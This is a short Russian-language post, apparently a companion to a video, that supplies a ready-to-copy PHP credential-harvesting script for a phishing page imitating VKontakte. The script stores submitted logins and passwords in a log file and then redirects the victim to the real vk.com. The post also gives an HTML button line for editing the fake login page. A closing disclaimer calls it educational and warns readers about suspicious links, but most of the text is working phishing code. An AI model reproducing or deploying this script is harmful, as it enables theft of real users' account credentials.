Данная статья идет как дополнение к видео, для удобства копирования.
Данный php-скрипт позволяет сохранить, введенные на фишинговом сайте, логин и пароль в отдельный файл passwords.log.
<?
$Login = $_POST['ithelp1']; // Логин атакуемого
$Pass = $_POST['ithelp2']; // Пароль атакуемого
$log = fopen("pass.log","a+"); // Открытие файла (pass.log), в который записываются пароли
fwrite($log,"<br> $Login:$Pass \n"); // Запись учетных данных в pass.log
fclose($log); // Закрытие файла
echo "<html><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></html>";
?>
Строка для редактирования index.htm, которая перенаправляет на реальный сайт.
<DIV class=»button_blue button_wide»><BUTTON id=»quick_login_button»> Войти</BUTTON></form></DIV>
Как это делается и для чего,можно посмотреть на видео, которое опубликовано в образовательных целях, для понимания механизма работы фишинговых сайтов и предупреждения утери ваших учетных данных через подозрительные сайты-сервисы и приложения.
Будьте внимательны прежде чем перейти по незнакомой навязчивой ссылке и ввести свои учетные данные от какого-либо аккаунта.